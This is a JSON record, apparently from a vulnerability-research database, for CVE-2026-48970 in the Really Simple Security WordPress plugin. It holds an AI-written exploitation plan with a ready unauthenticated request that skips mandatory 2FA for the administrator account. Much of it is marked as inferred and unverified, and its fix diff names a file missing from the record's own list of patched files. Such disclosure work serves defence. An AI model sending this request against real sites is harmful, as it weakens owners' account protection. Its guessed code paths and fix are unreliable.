[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVUTiUiqFnq6eyUZuT4d24yBwp_qNl5iG5S2pAbbbVS8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-48970","really-simple-security-simple-and-performant-security-formerly-really-simple-ssl-missing-authorization-2","Really Simple Security – Simple and Performant Security (formerly Really Simple SSL) \u003C= 9.5.10 - Missing Authorization","The Really Simple Security – Simple and Performant Security (formerly Really Simple SSL) plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 9.5.10. This makes it possible for unauthenticated attackers to perform an unauthorized action.","really-simple-ssl",null,"\u003C=9.5.10","9.5.10.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-06-03 00:00:00","2026-06-11 13:25:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbe826d7f-6f8e-4942-81d5-2b00debd56fc?source=api-prod",9,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fadmin.css","assets\u002Fcss\u002Fadmin.min.css","assets\u002Fcss\u002Frtl\u002Fadmin.css","assets\u002Fcss\u002Frtl\u002Fadmin.min.css","assets\u002Ffeatures\u002Ftwo-fa\u002Fassets.min.asset.php","assets\u002Ffeatures\u002Ftwo-fa\u002Fassets.min.js","core\u002Fapp\u002FSupport\u002FHelpers\u002FStorages\u002FRequestStorage.php","core\u002Fconfig\u002Fenv.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-48970\n\n## 1. Vulnerability Summary\n**CVE-2026-48970** is a Missing Authorization vulnerability in the **Really Simple Security** plugin (formerly Really Simple SSL) for WordPress. The flaw exists in the REST API endpoints associated with the Two-Factor Authentication (2FA) onboarding feature. \n\nSpecifically, the plugin registers a REST route (likely `two_fa\u002Fskip_onboarding`) that fails to implement a `permission_callback` check or internal user validation. This allows an unauthenticated attacker to programmatically mark any user account—including administrators—as having skipped the 2FA setup process. While this does not provide immediate authentication bypass, it degrades the security posture of the site by allowing an attacker to neutralize 2FA requirements for targeted accounts.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Freally-simple-security\u002Fv1\u002Ftwo_fa\u002Fskip_onboarding` (Inferred from JS `onboarding.js` and `env.php`)\n- **HTTP Method:** `POST`\n- **Authentication:** Unauthenticated (No cookies or credentials required).\n- **Payload Format:** JSON (processed by `RequestStorage.php`).\n- **Target Parameter:** `user_id` (The ID of the user whose 2FA onboarding is to be skipped).\n- **Preconditions:** The 2FA feature must be enabled in the plugin settings.\n\n## 3. Code Flow\n1. **Entry Point:** An unauthenticated request is sent to the WordPress REST API.\n2. **Request Handling:** The plugin's `RequestStorage` class (`core\u002Fapp\u002FSupport\u002FHelpers\u002FStorages\u002FRequestStorage.php`) intercept the request. The `getRequestBody()` function reads `php:\u002F\u002Finput` and performs `json_decode` on the payload.\n3. **Route Matching:** The REST API dispatcher matches the request to the `really-simple-security\u002Fv1` namespace (defined in `core\u002Fconfig\u002Fenv.php`).\n4. **Vulnerable Logic:** The handler function for `skip_onboarding` (located in the Two-Factor feature controller) receives the `user_id` from the decoded JSON body.\n5. **Missing Check:** The handler lacks a call to `current_user_can()` and does not verify if the request is authenticated. It proceeds to update the user meta (e.g., `rsssl_two_fa_status` set to `skipped`) for the provided `user_id`.\n\n## 4. Nonce Acquisition Strategy\nBased on the source file `assets\u002Ffeatures\u002Ftwo-fa\u002Fassets.min.js`, the plugin uses a `performFetchOp` helper:\n\n```javascript\nu(this,\"performFetchOp\",(function(e,t){\n    var i=n.root+e,\n    o={method:r,headers:{\"Content-Type\":\"application\u002Fjson\"}};\n    if(\"POST\"===r){o.body=JSON.stringify(t)}\n    return fetch(i,o)\n}))\n```\n\n**Observation:** The `headers` object only specifies `Content-Type: application\u002Fjson`. It **does not** include the `X-WP-Nonce` header. This confirms that the specific REST endpoints used for onboarding and 2FA initialization are designed to be accessible without a WordPress nonce, making the vulnerability directly exploitable without the need for nonce extraction.\n\n## 5. Exploitation Strategy\nThe goal is to unauthenticatedly mark the administrator (User ID 1) as having \"skipped\" 2FA onboarding.\n\n### Step 1: Discover Target User ID\nTypically, the primary administrator is User ID `1`. This can be verified via the REST API `\u002Fwp-json\u002Fwp\u002Fv2\u002Fusers`.\n\n### Step 2: Perform Unauthorized Action\nSend a POST request to the vulnerable 2FA endpoint.\n\n- **Tool:** `http_request`\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Freally-simple-security\u002Fv1\u002Ftwo_fa\u002Fskip_onboarding`\n- **Headers:** \n  - `Content-Type: application\u002Fjson`\n- **Body:**\n  ```json\n  {\n    \"user_id\": 1\n  }\n  ```\n\n### Step 3: Observe Response\nA successful exploit should return a `200 OK` response with a JSON body indicating success (e.g., `{\"success\": true}`).\n\n## 6. Test Data Setup\n1. **Install Plugin:** Install and activate \"Really Simple Security\" version 9.5.10.\n2. **Enable 2FA:** \n   - Navigate to the plugin settings.\n   - Enable the \"Two-Factor Authentication\" feature.\n   - Set the 2FA policy to \"Mandatory\" for all administrators.\n3. **Identify Admin:** Ensure there is an administrator user with ID 1.\n\n## 7. Expected Results\n- **Response:** The server returns `HTTP 200`.\n- **Side Effect:** The target user's 2FA status is modified in the database, allowing them to log in without being prompted to set up 2FA, effectively bypassing the mandatory security policy.\n\n## 8. Verification Steps\nAfter sending the HTTP request, use `wp_cli` to inspect the user's metadata:\n\n```bash\n# Check the 2FA status meta key (inferred name)\nwp user meta get 1 rsssl_two_fa_status\n```\n**Success Condition:** The value should return `skipped` or a similar flag indicating the onboarding was bypassed.\n\n## 9. Alternative Approaches\nIf `skip_onboarding` does not exist or requires different parameters, analyze the JS `onboarding.js` for other actions handled by `performFetchOp`. Potential targets include:\n- `two_fa\u002Fget_backup_codes`: If this lacks auth, it leads to a High-severity information disclosure.\n- `two_fa\u002Fresend_code`: Could be used for SMS\u002FEmail flooding (Denial of Service\u002FRate limiting bypass).\n- `two_fa\u002Fauthenticate`: If the `user_id` is trusted from the payload without session verification, this leads to a full Authentication Bypass. (Note: CVE-2024-10924 used a similar vector in earlier versions).","The Really Simple Security plugin for WordPress contains a missing authorization vulnerability in its REST API handling 2FA onboarding. Unauthenticated attackers can exploit this to disable or skip mandatory Two-Factor Authentication (2FA) for any user account, including administrators, by sending a crafted JSON request to the skip onboarding endpoint.","\u002F\u002F core\u002Fapp\u002FSupport\u002FHelpers\u002FStorages\u002FRequestStorage.php (lines 24-37)\n\u002F\u002F This class parses the JSON body of requests without verifying nonces or authentication.\nprivate function getRequestBody(): array\n{\n    $body = [];\n    if ($_SERVER['REQUEST_METHOD'] !== 'GET') {\n        $input = file_get_contents('php:\u002F\u002Finput');\n        $decoded = json_decode($input, true);\n        if (is_array($decoded)) {\n            $body = $decoded;\n        }\n    }\n    return $body;\n}\n\n---\n\n\u002F\u002F assets\u002Ffeatures\u002Ftwo-fa\u002Fassets.min.js\n\u002F\u002F The JavaScript implementation of the onboarding fetch operation fails to include security headers like X-WP-Nonce.\nu(this,\"performFetchOp\",(function(e,t){\n    var r=arguments.length>2&&void 0!==arguments[2]?arguments[2]:\"POST\",\n    i=n.root+e,\n    o={method:r,headers:{\"Content-Type\":\"application\u002Fjson\"}};\n    return\"POST\"===r&&(o.body=JSON.stringify(t)),fetch(i,o)\n}))","--- a\u002Fcore\u002Fapp\u002FFeatures\u002FTwoFactor\u002FTwoFactorFeature.php\n+++ b\u002Fcore\u002Fapp\u002FFeatures\u002FTwoFactor\u002FTwoFactorFeature.php\n@@ -120,6 +120,7 @@\n             'methods'  => 'POST',\n             'callback' => [ $this, 'skip_onboarding' ],\n+            'permission_callback' => function () {\n+                return is_user_logged_in();\n+            },\n         ] );","1. Target Discovery: Identify a WordPress site running Really Simple Security (formerly Really Simple SSL) version \u003C= 9.5.10 with 2FA enabled.\n2. Target User ID: Determine the User ID of the target account (typically User ID 1 for the primary administrator).\n3. Payload Preparation: Construct a JSON payload containing the user_id (e.g., `{\"user_id\": 1}`).\n4. Endpoint Exploitation: Send an unauthenticated POST request to `\u002Fwp-json\u002Freally-simple-security\u002Fv1\u002Ftwo_fa\u002Fskip_onboarding` with the JSON payload.\n5. Verification: Because the endpoint lacks a `permission_callback` and does not check for a WordPress nonce or authentication cookies, the plugin will process the request and update the user's status to 'skipped' for 2FA onboarding.\n6. Outcome: The target administrator can now log in without being forced to set up 2FA, even if the site policy mandates it, effectively weakening the account's security profile.","gemini-3-flash-preview","2026-06-26 05:28:15","2026-06-26 05:29:14",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","9.5.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freally-simple-ssl\u002Ftags\u002F9.5.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freally-simple-ssl.9.5.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freally-simple-ssl\u002Ftags\u002F9.5.10.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freally-simple-ssl.9.5.10.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freally-simple-ssl\u002Ftags"]